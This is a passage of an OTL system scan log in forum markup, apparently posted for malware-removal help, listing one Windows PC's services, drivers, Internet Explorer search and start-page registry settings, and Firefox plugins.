SRV - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2012/09/17 17:19:50 | 000,364,416 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/09/17 17:19:48 | 000,276,864 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/09/17 17:19:34 | 000,165,760 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2007/09/05 14:38:28 | 000,174,624 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe -- (TangoCoreService)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/03/04 19:25:11 | 000,377,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,264,000 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,114,496 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:04 | 000,044,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:[b]64bit:[/b] - [2014/12/12 09:51:20 | 000,075,776 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:[b]64bit:[/b] - [2014/11/13 21:35:31 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:47 | 000,415,040 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:12 | 000,136,512 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:[b]64bit:[/b] - [2014/10/29 12:57:42 | 000,054,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:[b]64bit:[/b] - [2014/10/29 12:56:04 | 000,027,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:43 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:41 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:09 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:54 | 000,126,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:39 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:16 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:[b]64bit:[/b] - [2014/10/15 17:32:36 | 000,921,920 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,238,912 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,086,336 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,039,744 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:[b]64bit:[/b] - [2014/10/08 18:24:09 | 000,467,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,324,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,189,248 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:[b]64bit:[/b] - [2014/10/07 15:44:39 | 000,069,952 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:[b]64bit:[/b] - [2014/10/01 19:54:16 | 003,828,152 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2014/09/24 16:27:11 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof)
DRV:[b]64bit:[/b] - [2014/09/24 15:58:01 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:48 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:[b]64bit:[/b] - [2014/09/24 15:29:18 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:[b]64bit:[/b] - [2014/08/15 09:36:55 | 000,146,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,038,296 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,027,032 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2013/08/22 21:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:[b]64bit:[/b] - [2013/08/22 21:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:[b]64bit:[/b] - [2013/08/22 20:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:[b]64bit:[/b] - [2013/08/22 17:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:[b]64bit:[/b] - [2013/08/13 08:25:46 | 000,017,624 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:[b]64bit:[/b] - [2013/08/10 09:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:[b]64bit:[/b] - [2013/08/06 15:13:30 | 000,023,040 | ---- | M] (Apple Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netaapl64.sys -- (Netaapl)
DRV:[b]64bit:[/b] - [2013/07/31 03:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:[b]64bit:[/b] - [2013/07/26 04:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:[b]64bit:[/b] - [2013/06/18 23:44:59 | 000,129,224 | ---- | M] (Qualcomm Atheros Co., Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\L1C63x64.sys -- (L1C)
DRV:[b]64bit:[/b] - [2013/04/04 14:50:32 | 000,025,928 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:[b]64bit:[/b] - [2012/09/01 18:01:56 | 000,647,736 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/08/14 18:03:34 | 002,206,352 | ---- | M] (VIA Technologies, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\viahduaa.sys -- (VIAHdAudAddService)
DRV:[b]64bit:[/b] - [2012/07/02 15:16:02 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2012/06/19 07:40:50 | 000,342,528 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2010/08/11 23:51:48 | 001,587,968 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ksaud.sys -- (ksaud)
DRV:[b]64bit:[/b] - [2010/07/05 13:47:00 | 000,565,248 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\GVUSB2.X64.SYS -- (GVUSB2.X64)
DRV - [2012/07/05 10:46:18 | 000,125,544 | ---- | M] () [Kernel | System | Running] -- C:\ProgramData\Kingsoft\klive\bin\encrypteddisk-x64.sys -- (EncryptedDisk)
DRV - [2007/07/06 15:34:36 | 000,016,800 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\RAWESR.sys -- (RAWESR)
DRV - [2007/07/06 15:34:34 | 000,013,600 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\LOGNT.SYS -- (LOGNT)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\NTSTPL2.SYS -- (NTSTPL2)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\ntstpl1.sys -- (NTSTPL1)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OCustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OSearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{726DA24E-A4A1-62E5-72EA-44C7886452CB}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS


IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://localoem.msn.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://home.kingsoft.jp [binary data]
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?FORM=UP97DF&PC=UP97&q={searchTerms}&src=IE-SearchBox
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:37.0.1
FF - user.js - File not found

FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@gamepot.co.jp/GamepotEXeEnvCtrl;version=1: C:\Program Files (x86)\Gamepot\GPEXE\\npGPEXE.dll ()
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKLM\Software\MozillaPlugins\pmang.jp/pmangsupport-1: C:\Users\ryota\Desktop\新しいフォルダー\GameOn\TERA\nppmangsupport_0.dll (gameon)
FF - HKCU\Software\MozillaPlugins\@neople.co.kr/NeopleGameInstaller: C:\ProgramData\NeoplePlugin\npNeopleGameInstaller.dll ( )

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Components: c:\program files (x86)\Mozilla Firefox\components [2014/08/30 11:40:53 | 000,000,000 | ---D | M]
